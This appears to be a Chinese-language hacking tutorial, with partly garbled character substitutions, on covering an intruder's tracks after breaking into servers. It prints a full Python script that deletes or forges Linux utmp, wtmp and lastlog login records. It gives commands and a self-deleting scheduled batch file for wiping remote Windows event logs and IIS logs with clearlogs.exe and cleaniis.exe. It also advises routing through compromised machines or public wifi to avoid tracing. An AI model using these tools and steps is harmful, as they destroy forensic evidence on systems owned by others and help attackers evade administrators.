第一种是直接修改服务器的日志
但是只收集到了只能修改linux的日志
躲避管理员w查看
python logtamper.py -m 1 -u root -i 192.168.0.188清除指定ip的登录日志python logtamper.py -m 2 -u root -i 192.168.0.188修改上次登录时间地点python logtamper.py -m 3 -u root -i 192.168.0.188 -t tty1 -d 2014:05:28:10:11:12最后自己再确认下看有没有修改成功,可以使用chown、touch命令修改时间和使用者,程序代码如下:
#!/usr/bin/env python # -*- coding:utf-8 -*- # mail: [email protected] import os, struct, sys from pwd import getpwnam from time import strptime, mktime from optparse import OptionParser UTMPFILE = "/var/run/utmp" WTMPFILE = "/var/log/wtmp" LASTLOGFILE = "/var/log/lastlog" LAST_STRUCT = 'I32s256s' LAST_STRUCT_SIZE = struct.calcsize(LAST_STRUCT) XTMP_STRUCT = 'hi32s4s32s256shhiii4i20x' XTMP_STRUCT_SIZE = struct.calcsize(XTMP_STRUCT) def getXtmp(filename, username, hostname): xtmp = '' try: fp = open(filename, 'rb') while True: bytes = fp.read(XTMP_STRUCT_SIZE) if not bytes: break data = struct.unpack(XTMP_STRUCT, bytes) record = [(lambda s: str(s).split("/0", 1)[0])(i) for i in data] if (record[4] == username and record[5] == hostname): continue xtmp += bytes except: showMessage('Cannot open file: %s' % filename) finally: fp.close() return xtmp def modifyLast(filename, username, hostname, ttyname, strtime): try: p = getpwnam(username) except: showMessage('No such user.') timestamp = 0 try: str2time = strptime(strtime, '%Y:%m:%d:%H:%M:%S') timestamp = int(mktime(str2time)) except: showMessage('Time format err.') data = struct.pack(LAST_STRUCT, timestamp, ttyname, hostname) try: fp = open(filename, 'wb') fp.seek(LAST_STRUCT_SIZE * p.pw_uid) fp.write(data) except: showMessage('Cannot open file: %s' % filename) finally: fp.close() return True def showMessage(msg): print msg exit(-1) def saveFile(filename, contents): try: fp = open(filename, 'w+b') fp.write(contents) except IOError as e: showMessage(e) finally: fp.close() if __name__ == '__main__': usage = 'usage: logtamper.py -m 2 -u b4dboy -i 192.168.0.188/n / logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2015:05:28:10:11:12' parser = OptionParser(usage=usage) parser.add_option('-m', '--mode', dest='MODE', default='1' , help='1: utmp, 2: wtmp, 3: lastlog [default: 1]') parser.add_option('-t', '--ttyname', dest='TTYNAME') parser.add_option('-f', '--filename', dest='FILENAME') parser.add_option('-u', '--username', dest='USERNAME') parser.add_option('-i', '--hostname', dest='HOSTNAME') parser.add_option('-d', '--dateline', dest='DATELINE') (options, args) = parser.parse_args() if len(args) < 3: if options.MODE == '1': if options.USERNAME == None or options.HOSTNAME == None: showMessage('+[Warning]: Incorrect parameter./n') if options.FILENAME == None: options.FILENAME = UTMPFILE # tamper newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME) saveFile(options.FILENAME, newData) elif options.MODE == '2': if options.USERNAME == None or options.HOSTNAME == None: showMessage('+[Warning]: Incorrect parameter./n') if options.FILENAME == None: options.FILENAME = WTMPFILE # tamper newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME) saveFile(options.FILENAME, newData) elif options.MODE == '3': if options.USERNAME == None or options.HOSTNAME == None or options.TTYNAME == None or options.DATELINE == None: showMessage('+[Warning]: Incorrect parameter./n') if options.FILENAME == None: options.FILENAME = LASTLOGFILE # tamper modifyLast(options.FILENAME, options.USERNAME, options.HOSTNAME, options.TTYNAME , options.DATELINE) else: parser.print_help()
下面是一些简单粗暴的办法
能够运用跳板。行业界可能用肉鸡等等的许多,也有的用IP诈骗(假如能够做到),你也能够侵略校园的动态分配IP的机器等等,这么很难往回查是哪个用户运用那个IP,并且也很简单去掉痕迹。你也能够考虑运用一些公共的wifi
DNS日志默许方位:%systemroot%system32config,默许文件巨细512KB,管理员都会改动这个默许巨细。安全日志文件:%systemroot%system32configSecEvent.EVT
体系日志文件:%systemroot%system32configSysEvent.EVT
应用程序日志文件:%systemroot%system32configAppEvent.EVT
FTP日志默许方位:%systemroot%system32logfilesmsftpsvc1,默许天天一个
WWW日志默许方位:%systemroot%system32logfilesw3svc1,默许天天一个日志
以上日志在注册表里的键: 应用程序日志,安全日志,体系日志,DNS效劳器日志,
它们这些LOG文件在注册表中的:
HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog
钥匙(表明成功)和锁(表明当用户在做啥时被体系中止)。连续四个锁图标,表明四次失利审阅,事情类型是帐户登录和登录刊出失利
如何删去这些日志: 经过上面,得知日志文件通常有某项效劳在后台维护,除了体系日志安全日志应用程序日志等等,它们的效劳是Windos2000的要害进程,并且与注册表文件在一块,当Windows2000发动后,发动效劳来维护这些文件,所以很难删去.
下面即是很难的安全日志和体系日志了,看护这些日志的效劳是Event Log,试着停掉它! D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 这项效劳无法承受恳求的"暂停" 或"中止" 操作。
怎样铲除体系日志.
怎样运用东西铲除IIS日志
怎样铲除前史和cookie
怎样观察防火墙Blackice的日志
netstat -an 表明的啥意思
--------------------------------------------------------------------------------------------------------------
1.体系日志 经过手艺很难铲除. 这儿咱们介绍一个东西 clearlog.exe
运用办法:
Usage: clearlogs [/computername] <-app / -sec / -sys>
-app = 应用程序日志
-sec = 安全日志
-sys = 体系日志
a. 能够铲除长途计算机的日志
** 先用ipc衔接上去: net use /ipipc$ 暗码/user:用户名
** 然后开端铲除: 办法
clearlogs /ip -app 这个是铲除长途计算机的应用程序日志
clearlogs /ip -sec 这个是铲除长途计算机的安全日志
clearlogs /ip -sys 这个是铲除长途计算机的体系日志
b.铲除本机日志: 假如和长途计算机的不能空衔接. 那么就需求把这个东西传到长途计算机上面
然后铲除. 办法:
clearlogs -app 这个是铲除长途计算机的应用程序日志
clearlogs -sec 这个是铲除长途计算机的安全日志
clearlogs -sys 这个是铲除长途计算机的体系日志
安全日志现已被铲除.Success: The log has been cleared 成功.
为了更安全一点.相同你也能够树立一个批处理文件.让主动铲除. 做好批处理文件.然后用at指令树立一个计划任务. 让主动运转. 以后你就能够脱离你的肉鸡了.
例如树立一个 c.bat
rem ============================== 开端
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 完毕
在你的计算机上面测试的时候 能够不要 @echo off 能够显现出来. 你能够看到成果
第一行表明: 运转时不显现窗口
第二行表明: 铲除应用程序日志
第三行表明: 铲除安全日志
第四行表明: 铲除体系日志
第五行表明: 删去 clearlogs.exe 这个东西
第六行表明: 删去 c.bat 这个批处理文件
第七行表明: 退出
用AT指令. 树立一个计划任务. 这个指令在本来的教程里边和杂志里边都有. 你能够去看看具体的运用办法
AT 时刻 c:c.bat
以后你就能够安全脱离了. 这么才更安全一点.
--------------------------------------------------------------------------------------------------------------
2.铲除iis日志:
东西:cleaniis.exe
运用办法:
iisantidote
iisantidotestop
stop opiton will stop iis before clearing the files and restart it after
exemple : c:winntsystem32logfilesw3svc1 dont forget the
运用办法解说:
cleaniis.exe iis日志寄存的途径 铲除参数
啥意思呢??我来给大家举个比如吧:
cleaniis c:winntsystem32logfilesw3svc1 192.168.0.1
这个表明铲除log中一切此IP(192.168.0.1)地址的拜访记录. -----引荐运用这种办法
cleaniis c:winntsystem32logfilesw3svc1 /shop/admin/
这个表明铲除这个目录里边的所以的日志
c:winntsystem32logfilesw3svc1 代表是iis日志的方位(windows nt/2000) 这个途径能够改动
c:windowssystem32logfilesw3svc1 代表是iis日志的方位(windows xp/2003) 这个途径能够改动
这个测试表明 在日志里边没有这个ip地址.
咱们看一下日志的途径 再来看一下
咱们的ip(192.168.0.1)现已没有了.
现已悉数清空. 相同这个也能够树立批处理. 办法同上面的那个.
--------------------------------------------------------------------------------------------------------------
3.铲除前史记录及运转的日志:
cleaner.exe
直接运转就能够了.
4.观察blackice的日志.
这个当地咱们能够铲除的看到 防火墙的日志.
这个表明 有人发过来带有病毒的email附件. ip是: 220.184.153.116
tcp_probe_other 表明 经过tcp 扫描 或许运用其他和你树立衔接 通信
这个表明经过端口 80 扫描iis
病毒 nimda
这儿需求许多的计算机协议常识. 一起也需求对英语有了解
才干更好的剖析 假如对英语欠好 你能够装一个金山词霸.
通常状况下 咱们能够 对一些能够不必管.
通常这三种状况 不必去管.
最上面的 critical 这个 能够去重视一下 . 通常是的确有其他计算机扫描或许侵略你的计算机
count 代表次数 intruder 是对方的ip event 是经过啥方法(协议) 扫描或许想侵略的
time表明时刻
5.--------------------------------------------------------------------------------------------------------------
netstat -an 表明啥意思?
运用这个指令能够观察到和本机的一切的衔接.
Proto Local Address Foreign Address State
协议 本地端口及IP地址 长途端口及IP地址 状况
LISTENING 监听状况 表明等候对方衔接
ESTABLISHED 正在衔接着.
TCP 协议是TCP
UDP 协议是UDP
TCP 192.168.0.10:1115 61.186.97.54:80 ESTABLISHED
这个表明 运用tcp协议 本机ip(192.168.0.10)经过端口:1115 和长途ip(61.186.97.54)端口:80衔接
80端口 表明 http 即是你在拜访这个网站.
通常状况下长途ip的端口: 80 21 8000 这个都是正常的. 假如是其他 就能够看一下你的计算机了。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论